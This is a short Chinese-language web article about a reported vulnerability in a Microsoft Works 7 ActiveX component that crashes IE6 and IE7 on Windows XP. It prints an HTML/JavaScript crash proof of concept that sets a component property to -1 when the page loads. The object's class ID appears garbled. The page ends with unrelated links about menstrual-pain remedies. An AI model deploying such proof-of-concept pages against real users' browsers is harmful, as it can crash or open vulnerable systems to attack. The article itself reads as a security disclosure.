大兴信息港

当前位置:

又一个IE0day漏洞问题出自

2019/05/15 来源:大兴信息港

导读

近几天络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE

近几天络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部份的XP预装了Microsoft Works,所以就出现了过全补钉系统的漏洞(如华硕易PC 就预装了Microsoft Works)。

影响的DLL版本:Microsoft Works 7 l (7.03.0616.0)

以下为crash POC

html

head

titleMicrosoft Works 7 l crash POC/title

script language=”JavaScript”

function payload() {

var num = -1;

sPictureInterface = num;

}

/script

/head

body onload=”JavaScript: return payload();”

object classid=”clsid:00E1DBEFD-4CEC0A-2DA3BCAAD9C6″ id=”obj”

/object

/body

/html

治疗经间期出血的中药
女生痛经吃什么能缓解
痛经快速止痛的小妙招
标签